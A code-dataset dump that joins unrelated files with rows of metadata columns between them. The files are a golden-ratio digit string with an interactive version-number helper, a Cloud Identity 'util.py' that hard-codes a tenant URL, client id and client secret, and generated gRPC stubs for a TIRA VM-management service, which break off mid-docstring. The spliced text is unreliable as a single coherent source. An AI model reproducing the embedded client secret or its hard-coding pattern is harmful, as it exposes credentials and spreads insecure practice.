73432613483049494968681089535696348281781288625364608420339465381944194571426668237183949183237090857485026656803989744066210536030640026081711266599541993687316094572288810920778822772036366844815325617284117690979266665522384688311371852991921631905201568631222820715599876468423552059285371757807656050367731309751912239738872246825805715974457404842987807352215984266766257807706201943040054255015831250301753409411719101929890384472503329880245014367968441694795954530459103138116218704567997866366174605957000344597011352518134600656553520347888117414994127482641521355677639403907103870881823380680335003804680017480822059109684420264464021877053401003180288166441530913939481564031928227854824145105031888251899700748622879421558957428202166570621880905780880503246769912972872103870736974064356674589202586565739785608595665341070359978320446336346485489497663885351045527298242290699848853696828046459745762651434359050938321243743333870516657149005907105670248879858043718151261004403814880407252440616429022478227152724112085065788838712493635106806365166743222327767755797399270376231914704732395512060705503992088442603708790843334261838413597078164829553714321961189503797714630007555975379570355227144931913217255644012830918050450089921870512118606933573153895935079030073672702331416532042340155374144268715405511647961143323024854404094069114561398730260395182816803448252543267385759005604320245372719291248645813334416985299391357478698957986439498023047116967157362283912018127312916589952759919220318372356827279385637331265479985912463275030060592567454979435088119295056854932593553187291418011364121874707526281068698301357605247194455932195535961045283031488391176930119658583431442489489856558425083410942950277197583352244291257364938075417113739243760143506829878493271299751228688196049835775158771780410697131966753477194792263651901633977128473907933611119140899830560336106098717178305543540356089529290818464143713929437813560482038947912574507707557510300242072662
90018090422934249425906066614133228722698069014599451199547801639915141261252572828066433126165746938819510644216738718000110042184830258091654338374923641183888564685143150063731904295148146942431460895254707203740556691306922099080481945297511065046428105417755259095187131888359147659960413179602094153085855332387725380232727632977372143127968216716234421183201802881412747443168847218459392781435474099999072233203059262976611238327983316988253931262006503702884478286669404473079471047612558658375298623625099982323359715507233838332440815257781933642626304330265895817080045127887311593558774721725649470005163667257715392098409503274511215368730091219962952276591316370939686072713426926231547533043799331658110736964314217197943405639155121081081362626888569748068060116918941750272298741586991791453499462444194012197858601373660828690722365147713912687420966513787562059185432888834174292090156313328319357562208971376563097850156315498245644586542479293572282875060848145335135218172958793299117100324762220521946451053624505129884308713444395072442673514628617991832336459836963763272257569159723954383052086647474238151107927349483695239647926899369832491799950278950006045966131346336302494995148080532901790297518251587504900743518798351183603272277260171740453557165885557829729106195819351710554825793070910057635869901929721799516873117556314448564810022001425454055429273458837116020994794572082378043687189448056368918258024449963187834202749101533579107273362532890693347412380222201162627711930854485029541913200400999865566651775664095365619789781838045103035651013158945890287186108690589394713680148457001836649564720329433437429894642741255143590584348409195487015236140317391390361644019845505104912116979200120199960506994966403035086369290394100701945053201623487276323273244943963048089055425137972331475185207091025063685981679530481810073942453170023880475983432345041425843140636127210960228242337822809027976596077710849391517488731687771352239009117117350918600654
62009902497585277925427816597038349505801062615533369109378465977105297502231730741217783441894118459658610298018778742744563866966127724503845860526415103040898257777544741153320764075881677514975538047116296677710058766461595496776927054962393985709255070274069978140843124965363071866533718060587422425981653070525738345415770542921629981149175086113117657731720956156564786954744892713206080635457794624145310669837421137981689638235333044778831693397287289181036640832698569882544385166758622899306964346848975148408790396476042036102060217173944702634876336543931952290773836167389811781242483655781050341694515636260430036657431084766548777801285779236454185224472361713742292558415931356128663716703280721715533926463257306730639108541088680857428385882806023033414085503909735387261345119629264159952127893113544314601527309025538271043259662267439037455636122861390783194335705900381487008986613153981958574423304419708566967222931427307413848827889755888607997387044702031668348569419909654802982493198176579268298556297230106827772351627407838074318778273182119196952800516087915721288263379682312725628700015001829297577299935790949196407634428615757135444278983830404547027101945800425820212023445806303450336581472185492036799899729353539196812133195165379745399111494244451830338588412904018178188213760066592849413677543174516054093871103687152116404058219344712044827759605416948645398783262695480139150190389959313067031866167066371964025692867138871466311891926856826919952764579977182787594609616172188681094546515788691224106098141972686192554787899263153594729228250805425169068140107817960218853307623055638163164019224545032576567392599765175308014271607143087188628598360374650571342046700834327542302770477933111836669032328853068738799071359007403049074598895136476876086784432382482189306175703195638032308197193635672741964387262587061543307296370381275151704060050575948827238563451563905265771042645947604055695095984088890376207995663880178618559159441117250923132797
7113803"
# φ = φ.replace(' ', "")
# print(φ)
def phi(n=6):
    """Return the golden ratio φ truncated to *n* decimal places.

    Args:
        n: number of decimal places to keep (default 6).  Clamped to the
           range [0, number of digits available in the module-level φ
           string]; the original code raised ValueError for n <= -2 and
           returned 1.0 for n == -1.

    Returns:
        float: φ truncated (not rounded) to n decimals.  NOTE: a Python
        float only carries ~15-17 significant digits, so n > 15 silently
        loses precision.
    """
    # "1." occupies two characters, so n decimals need the first n+2 chars.
    n = max(0, min(n, len(φ) - 2))
    return float(φ[:n + 2])
def nextver():
    """Interactively prompt for a version string and print the next one.

    A "version" is the first n digits of the golden ratio φ; the next
    version appends one more digit of φ.  Accepted input shapes:
        "0.1.618..." (package-style), "1.618...", ".618...", "618..."

    Loops until a valid prefix of φ is entered, then prints the current
    and next versions (with digit counts) and returns None.

    Fixes over the previous revision: corrected the "Plea.se" typo in the
    error message, removed two byte-identical duplicated error branches and
    a dead ``except ValueError`` (``input`` never raises it), and rejects
    inputs that merely *start* like φ but diverge later — previously
    ``φ.find(...)`` returned -1 for those and garbage slices were printed.
    """
    error_msg = ("\nInput is not the start of φ. "
                 "Please enter the first n digits of φ.")
    examples = "\ne.g. 1.618... , .618... or 618...\n"
    while True:
        current_version = input(
            "What is the current version? ").strip().strip('"')
        # Normalise every accepted spelling to `core`, the "1.6..." form
        # that can be matched directly against φ, and remember how the
        # input should be echoed back (`display`).
        if current_version.startswith("0.1.61"):
            core = current_version[2:]
            display = current_version
        elif current_version.startswith("1.61"):
            core = current_version
            display = f"0.{current_version}"
        elif current_version.startswith("61"):
            core = f"1.{current_version}"
            display = f"0.1.{current_version}"
        elif current_version.startswith(".61"):
            core = f"1{current_version}"
            display = f"0.1{current_version}"
        else:
            print(error_msg)
            print(examples)
            continue
        # Guard against inputs that look like φ but are not real prefixes.
        if not φ.startswith(core):
            print(error_msg)
            print(examples)
            continue
        next_version = φ[:len(core) + 1]
        print(f"\nCurrent version: {display} ({len(core)})\n")
        print(f"Next version: 0.{next_version} ({len(next_version)})\n")
        print(f"{next_version[2:]}\n")
        break
# Run the interactive version helper only when executed as a script.
if __name__ == "__main__":
    nextver()
| 154.08046
| 10,008
| 0.876166
| 431
| 13,405
| 27.048724
| 0.171694
| 0.028821
| 0.004804
| 0.006862
| 0.107308
| 0.09976
| 0.097615
| 0.097615
| 0.092898
| 0.092898
| 0
| 0.833607
| 0.091682
| 13,405
| 86
| 10,009
| 155.872093
| 0.12385
| 0.02417
| 0
| 0.424242
| 0
| 0
| 0.832771
| 0.768871
| 0
| 1
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0
| 0
| 0.045455
| 0.272727
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9c5ffd4cbd91edd262a5e432fe077f37f25cfed4
| 233
|
py
|
Python
|
stix_shifter/stix_transmission/src/modules/cloudIdentity/util.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter/stix_transmission/src/modules/cloudIdentity/util.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter/stix_transmission/src/modules/cloudIdentity/util.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | 2
|
2019-06-26T19:23:52.000Z
|
2019-07-09T15:33:16.000Z
|
def getUri():
    """Return the base URL of the Cloud Identity demo tenant."""
    base_url = 'https://ppsdemo.ice.ibmcloud.com'
    return base_url
def getid():
    """Return the client id used for the Cloud Identity demo tenant.

    NOTE(review): credential-like value embedded in source; should come
    from configuration or secret storage.
    """
    client_id = '35f095e9-65c6-4eab-9040-3c52ab6f3e3d'
    return client_id
def getSecret():
    """Return the client secret for the Cloud Identity demo tenant.

    NOTE(review): hard-coded secret in source control — rotate and move to
    secret storage.
    """
    client_secret = '3f6bN4mw66'
    return client_secret
def getRegistry():
    """Return the registry identifier for the Cloud Identity demo tenant."""
    registry_id = 'bbdef01e-dce8-4fa4-b310-88b42b48169d'
    return registry_id
| 25.888889
| 49
| 0.716738
| 28
| 233
| 5.964286
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.208955
| 0.137339
| 233
| 9
| 50
| 25.888889
| 0.621891
| 0
| 0
| 0
| 0
| 0
| 0.48927
| 0.309013
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
130e014dcd18d7c4b79b5d2559a40679137cb409
| 29,697
|
py
|
Python
|
tira-protocol/build/python/tira_host_pb2_grpc.py
|
maexe/tira
|
2018fb08d9f8b07f68fd4dadc4633d1ff25a88a3
|
[
"MIT"
] | null | null | null |
tira-protocol/build/python/tira_host_pb2_grpc.py
|
maexe/tira
|
2018fb08d9f8b07f68fd4dadc4633d1ff25a88a3
|
[
"MIT"
] | null | null | null |
tira-protocol/build/python/tira_host_pb2_grpc.py
|
maexe/tira
|
2018fb08d9f8b07f68fd4dadc4633d1ff25a88a3
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from . import tira_host_pb2 as tira__host__pb2
class TiraHostServiceStub(object):
    """Client-side stub for the TiraHostService.

    NOTE: generated by the gRPC Python protocol compiler plugin; regenerate
    from the .proto file instead of editing by hand.
    """

    def __init__(self, channel):
        """Constructor.
        Args:
            channel: A grpc.Channel.
        """
        # One unary-unary callable per RPC.  vm_* take VmDetails, run_*
        # take RunDetails; vm_list and alive take Empty.  All return
        # Transaction except vm_info (VmInfo) and alive (Empty).
        self.vm_backup = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_backup',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_create = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_create',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_delete = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_delete',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_info = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_info',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.VmInfo.FromString,
                )
        self.vm_list = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_list',
                request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_metrics = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_metrics',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_sandbox = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_sandbox',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_shutdown = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_shutdown',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_snapshot = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_snapshot',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_start = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_start',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_stop = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_stop',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.vm_unsandbox = channel.unary_unary(
                '/tira.generated.TiraHostService/vm_unsandbox',
                request_serializer=tira__host__pb2.VmDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.run_execute = channel.unary_unary(
                '/tira.generated.TiraHostService/run_execute',
                request_serializer=tira__host__pb2.RunDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.run_eval = channel.unary_unary(
                '/tira.generated.TiraHostService/run_eval',
                request_serializer=tira__host__pb2.RunDetails.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.alive = channel.unary_unary(
                '/tira.generated.TiraHostService/alive',
                request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
                response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
                )
class TiraHostServiceServicer(object):
    """Server-side handlers for the TiraHostService.

    Every method is a generated placeholder that reports UNIMPLEMENTED;
    subclass and override the RPCs you actually serve.
    NOTE: generated code — regenerate from the .proto rather than editing.
    """

    def vm_backup(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_create(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_delete(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_info(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_list(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_metrics(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_sandbox(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_shutdown(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_snapshot(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_start(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_stop(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def vm_unsandbox(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def run_execute(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def run_eval(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def alive(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_TiraHostServiceServicer_to_server(servicer, server):
    # Generated registration helper: wraps each servicer method in a
    # unary-unary RPC handler and registers the set under the
    # fully-qualified service name 'tira.generated.TiraHostService'.
    rpc_method_handlers = {
            'vm_backup': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_backup,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_create': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_create,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_delete': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_delete,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_info': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_info,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.VmInfo.SerializeToString,
            ),
            'vm_list': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_list,
                    request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_metrics': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_metrics,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_sandbox': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_sandbox,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_shutdown': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_shutdown,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_snapshot': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_snapshot,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_start': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_start,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_stop': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_stop,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'vm_unsandbox': grpc.unary_unary_rpc_method_handler(
                    servicer.vm_unsandbox,
                    request_deserializer=tira__host__pb2.VmDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'run_execute': grpc.unary_unary_rpc_method_handler(
                    servicer.run_execute,
                    request_deserializer=tira__host__pb2.RunDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'run_eval': grpc.unary_unary_rpc_method_handler(
                    servicer.run_eval,
                    request_deserializer=tira__host__pb2.RunDetails.FromString,
                    response_serializer=tira__host__pb2.Transaction.SerializeToString,
            ),
            'alive': grpc.unary_unary_rpc_method_handler(
                    servicer.alive,
                    request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
                    response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'tira.generated.TiraHostService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class TiraHostService(object):
    """Static per-RPC convenience API for TiraHostService.

    Each staticmethod issues the RPC via grpc.experimental.unary_unary
    against a target address without constructing a stub first.
    NOTE: generated code (EXPERIMENTAL gRPC API) — regenerate from the
    .proto rather than editing.
    """

    @staticmethod
    def vm_backup(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_backup',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_create(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_create',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_delete(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_delete',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_info(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_info',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.VmInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_list(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_list',
            google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_metrics(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_metrics',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_sandbox(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_sandbox',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_shutdown(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_shutdown',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_snapshot(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_snapshot',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_start(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_start',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_stop(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_stop',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def vm_unsandbox(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/vm_unsandbox',
            tira__host__pb2.VmDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def run_execute(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/run_execute',
            tira__host__pb2.RunDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def run_eval(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/run_eval',
            tira__host__pb2.RunDetails.SerializeToString,
            tira__host__pb2.Transaction.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def alive(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/tira.generated.TiraHostService/alive',
            google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
class TiraApplicationServiceStub(object):
    """Client-side stub for the TiraApplicationService.

    NOTE: generated by the gRPC Python protocol compiler plugin; regenerate
    from the .proto file instead of editing by hand.
    """

    def __init__(self, channel):
        """Constructor.
        Args:
            channel: A grpc.Channel.
        """
        # set_state / confirm_creation take VmState; complete_transaction
        # takes Transaction.  All three return Transaction.
        self.set_state = channel.unary_unary(
                '/tira.generated.TiraApplicationService/set_state',
                request_serializer=tira__host__pb2.VmState.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.confirm_creation = channel.unary_unary(
                '/tira.generated.TiraApplicationService/confirm_creation',
                request_serializer=tira__host__pb2.VmState.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
        self.complete_transaction = channel.unary_unary(
                '/tira.generated.TiraApplicationService/complete_transaction',
                request_serializer=tira__host__pb2.Transaction.SerializeToString,
                response_deserializer=tira__host__pb2.Transaction.FromString,
                )
class TiraApplicationServiceServicer(object):
    """Server-side handler interface for tira.generated.TiraApplicationService."""

    def _unimplemented(self, context):
        # Shared failure path: report UNIMPLEMENTED over the wire and also
        # raise locally so misuse is visible in-process.
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def set_state(self, request, context):
        """Override in a subclass to handle set_state requests."""
        self._unimplemented(context)

    def confirm_creation(self, request, context):
        """Override in a subclass to handle confirm_creation requests."""
        self._unimplemented(context)

    def complete_transaction(self, request, context):
        """Override in a subclass to handle complete_transaction requests."""
        self._unimplemented(context)
def add_TiraApplicationServiceServicer_to_server(servicer, server):
    """Register the TiraApplicationService handlers of *servicer* on *server*."""
    # Every method deserializes its own request type but serializes a
    # Transaction response, so the handler table can be comprehension-built.
    method_specs = {
        'set_state': (servicer.set_state, tira__host__pb2.VmState),
        'confirm_creation': (servicer.confirm_creation, tira__host__pb2.VmState),
        'complete_transaction': (servicer.complete_transaction, tira__host__pb2.Transaction),
    }
    rpc_method_handlers = {
        name: grpc.unary_unary_rpc_method_handler(
            behaviour,
            request_deserializer=request_cls.FromString,
            response_serializer=tira__host__pb2.Transaction.SerializeToString,
        )
        for name, (behaviour, request_cls) in method_specs.items()
    }
    generic_handler = grpc.method_handlers_generic_handler(
        'tira.generated.TiraApplicationService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class TiraApplicationService(object):
    """Stub-free convenience client for tira.generated.TiraApplicationService.

    Each static method performs a one-shot unary-unary call via the
